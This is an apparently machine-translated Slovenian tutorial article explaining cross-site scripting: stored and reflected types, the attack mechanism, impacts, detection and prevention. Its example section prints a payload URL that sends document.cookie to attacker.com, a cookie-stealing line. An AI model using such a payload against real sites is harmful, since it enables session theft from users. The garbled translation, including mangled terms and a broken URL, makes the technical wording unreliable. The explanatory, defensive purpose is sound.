Uvod v skriptno skripta

  • Z naraščajočim številom spletnih aplikacij na internetu je spletna varnost postala pomembna skrb. Vdore in kraje zasebnih podatkov uporabnikov so zdaj pogosti in ogrožajo njihovo uporabo katere koli aplikacije. Cross Site Scripting je eden izmed priljubljenih napadov na spletno varnost uporabnikov. Dajmo si nekaj vpogleda v to, kaj je tiskanje med spletnimi stranmi.
  • Cross Site Scripting, imenovan XSS, je računalniška varnostna ranljivost, pri kateri želi napadalec dodati nekaj zlonamerne kode v obliki skriptov na zaupanja vredno spletno mesto / spletno stran. To je napad vbrizgavanja kode na strani odjemalca in zlonamerni skript se izvrši v spletnem brskalniku uporabnika, ko dostopa do tega spletnega mesta / spletne strani. Posredno ta spletna stran postane medij za pošiljanje zlonamerne kode uporabniku. Z vbrizgavanjem skript napadalci zaobidejo varnostne omejitve DOM (Document Object Model) in dobijo dostop do občutljive vsebine strani, piškotkov sej, zgodovine brskanja po večini zasebnih podatkov, ki jih vzdržuje brskalnik.
  • Spletno mesto, ki vsebuje forume, oglasne deske, spletne strani, ki omogočajo komentarje, in tiste, ki uporabljajo neanimiziran uporabniški vnos in ustvarjen izid, so najbolj izpostavljeni napadom XSS. Čeprav so napadi XSS možni v VBScript, ActiveX in CSS, so najpogostejši v Javascriptu kot osnovnem za večino izkušenj brskanja.

Različne vrste skriptnega skripta (XSS)

Čeprav ni posebne klasifikacije križarjenja po spletnih straneh, so jo nekateri strokovnjaki razvrstili v dve vrsti, ki sta podrobno obravnavani v nadaljevanju:

Shranjeni napadi XSS :

  • Shranjeni XSS so tisti, pri katerih se zlonamerni skript, ki ga vbrizga napadalec, shrani v bazo podatkov in se zažene v brskalniku uporabnika, ko poskuša dostopati do baze podatkov v kakšni obliki. Ti so znani tudi kot Obstojni ali shranjeni XSS. To je eden najbolj uničujočih napadov in se zgodi, zlasti kadar spletna stran / spletna stran omogoča komentiranje ali dovoljuje vdelavo vsebine HTML.
  • Napadalec doda komentar v komentar, ki se shrani v bazo podatkov, in ko uporabnik dostopa do prizadete strani, pri čemer pridobi podatke iz baze, ki v svojem brskalniku zažene zlonamerni skript in napadalec dobi nepooblaščen dostop do zasebnih podatkov uporabnika.
  • Na primer, na spletnem mestu za e-trgovino, kot je Olx, ki vsebuje nesanimizirano sporočilo za opis izdelka, napadalec, ki je prodajalec izdelka, vanj doda zlonamerni javascript in shrani se v bazo podatkov spletnega mesta.
  • Ko bo kupec odprl opis izdelka za ogled podrobnosti izdelka, bo postal žrtev, ko se skript izvrši v njegovem spletnem brskalniku, vse podrobnosti uporabnika, ki jih brskalnik dovoli, pa bodo ugrabljeni.

Postopek napadi XSS:

  • To je eden najpogostejših načinov, s katerim lahko napadalec povzroči napad XSS na uporabnika. V napadih postopka XSS napadalec v bistvu usmeri žrtev tako, da v rezultatih iskanja pošlje e-poštno sporočilo, zlonamerno povezavo ali doda niz, ki kaže na zaupanja vredno spletno mesto, vendar vsebuje zlonamerno kodo JavaScripta.
  • Če žrtev klikne na ta URL, sproži zahtevo HTTP in jo pošlje ranljivemu spletnemu programu. Zahteva se nato vrne žrtvi z odgovorom vdelane kode JavaScript, ki jo spletni brskalnik izvrši, če upošteva, da prihaja z zaupanja vrednega spletnega mesta in povzroči ugrabitev zaupnih podatkov svojega brskalnika.
  • Na primer, na spletnem mestu za e-trgovino je iskalno polje, v katerem lahko uporabnik išče elemente, niz, napisan v iskalnem polju, pa je viden v URL-ju spletnega mesta, ko je iskalna zahteva poslana strežniku.
  • Napadalec ustvari povezavo, v kateri je zlonamerni skript združen v URL-ju in ga pošlje žrtvi po e-pošti. Ko žrtev odpre to povezavo, se zahteva pošlje na zlonamerno spletno mesto napadalca in vsi podatki brskalnika o žrtvi so ugrabljeni in poslani v sistem napadalca.

Kako deluje križno skripta (XSS)?

  • Pri ranljivosti Cross Site Scripting (XSS) je glavni motiv napadalca, da ukrade podatke uporabnika, tako da v brskalniku zažene zlonamerni skript, ki ga vbrizgajo v vsebino spletnega mesta, ki jo uporabnik uporablja na različne načine.
  • Na primer, ko uporabnik poišče nekaj besedila na spletnem mestu, se zahteva pošlje strežniku v obliki:

https://www.abcwebsite.com/search?q=text1

V rezultatu iskanja spletno mesto vrne rezultat skupaj s tistim, kar je iskal uporabnik:

Iskali ste: text1

Če je iskalna funkcionalnost ranljiva za XSS, lahko napadalec v URL doda zlonamerni skript:

https://www.abcwebsite.com/search= lokacija dokumenta = https: //attacker.com/log.php? c = '+ encodeURIComponent (document.cookie)
  • Ko žrtev klikne to povezavo, se preusmeri na zlonamerno spletno mesto, tj. Https://attacker.com, vsi podatki brskalnika pa se neposredno pošljejo v računalnik napadalca, kar povzroči, da napadalec ukrade vse žetone / piškotke seje.
  • Na ta način napadalec v svoj URL vbrizga zlonamerni skript, Attacker lahko ta skript shrani tudi v strežnik, ki spada pod Shranjeni XSS.

Vpliv ranljivosti čezmejnih skript:

Vpliv skripta na različnih straneh se zelo razlikuje. Po izkoriščanju ranljivosti XSS napadalec pridobi popoln nadzor nad brskalnikom žrtve in lahko izvaja različna dejanja, ki se razlikujejo od majhnih, kot je ogled zgodovine brskalnika, do katastrofalnih, kot je vstavljanje črvov v računalnik.

Nekatera dejanja, ki jih napadalec lahko izvede z izkoriščanjem ranljivosti XSS, so naslednja: -

  1. Pušča občutljive podatke, kot so uporabniško ime in geslo.
  2. Vstavljanje črvov v računalnik.
  3. Preusmeritev uporabnika na neko nevarno spletno mesto in prisiljanje k izvedbi nekaterih dejanj
  4. Dostop do zgodovine brskanja o žrtvi.
  5. Namestitev programa Trojanski konj.
  6. Prisilite uporabnika, da izvaja in spreminja vrednosti v aplikaciji tako, da pridobi dostop

Iskanje ranljivosti med skrivnostnimi skriptami:

  • Ranljivosti XSS se pojavijo iz dveh razlogov, bodisi vhod od uporabnika pred potrditvijo na strežnik ni potrjen ali izhod, prejet v brskalnik, ni kodiran HTML. Upoštevajoč katastrofalen vpliv ranljivosti XSS in varovanje zasebnosti uporabnikov, je zelo pomembno ugotoviti, ali je spletna aplikacija ranljiva za XSS ali ne.
  • Čeprav je XSS težko prepoznati in odstraniti, je najboljši način preverjanja varnostni pregled kode in preverjanje vseh krajev, kjer se lahko vhod iz zahteve HTTP prikaže kot izhod v aplikaciji. Uporaba orodij za samodejni bralnik ranljivosti, ki vključujejo poseben modul za skeniranje XSS za skeniranje celotne spletne aplikacije, lahko pomaga tudi pri skeniranju in iskanju ranljivosti v aplikaciji.

H zaradi Prevent XSS?

  • XSS je ranljivost za vstavljanje kode, zato je zelo pomembno kodiranje podatkov, ki so poslani strežniku, in podatkov, ki prihajajo s strežnika v brskalnik uporabnika.
  • Validacija podatkov je prav tako zelo pomembna, tako da brskalnik interpretira kodo brez zlonamernih ukazov. Uvedeni so bili različni načini preprečevanja, pri čemer je validacija podatkov in kodiranje prednostna naloga, da je spletno mesto ranljivo za XSS.

Za preprečitev XSS je treba osredotočiti nekaj točk: -

  1. Podporo HTTP Trace na vseh spletnih strežnikih je treba izklopiti, saj lahko napadalec s klicem sledenja HTTP s strežnika ukrade piškotek in podatke zasebnega brskalnika, tudi če je v brskalniku žrtve onemogočen document.cookie.
  2. Razvijalci bi morali sanitirati vnesene podatke in ne smejo nikoli oddajati podatkov, ki so jih prejeli od uporabnika, ne da bi jih potrdili.
  3. Povezave na splošno ne smejo biti prepovedane, če se ne začnejo s seznami s seznami s seznami, na primer HTTP: //, https: // in s tem preprečijo uporabo URI shem, kot je javascript: //

Zaključek:

Napadi XSS so nevarni in lahko škodijo zasebnosti uporabnika in ukradejo podatke, razen če običajen uporabnik previdno brska po aplikaciji. Tako morajo razvijalci pri razvoju aplikacije upoštevati stroga varnostna pravila, zlasti za podatke in strežnik, tako da je aplikacija najmanj ranljiva za XSS in se več uporabnikov lahko zanese nanjo.

Priporočeni članki

To je vodnik o tem, kaj je skriptno skripta? Tukaj razpravljamo o različnih vrstah premestitve, dela, vpliva in preprečevanja XSS. Če želite izvedeti več, lahko preberete tudi druge naše predlagane članke -

  1. Kako deluje JavaScript
  2. Kaj je lažni napad?
  3. Kaj je kibernetski napad?
  4. HTTP predpomnjenje
  5. Kako piškotki delujejo v JavaScript s Primerjem?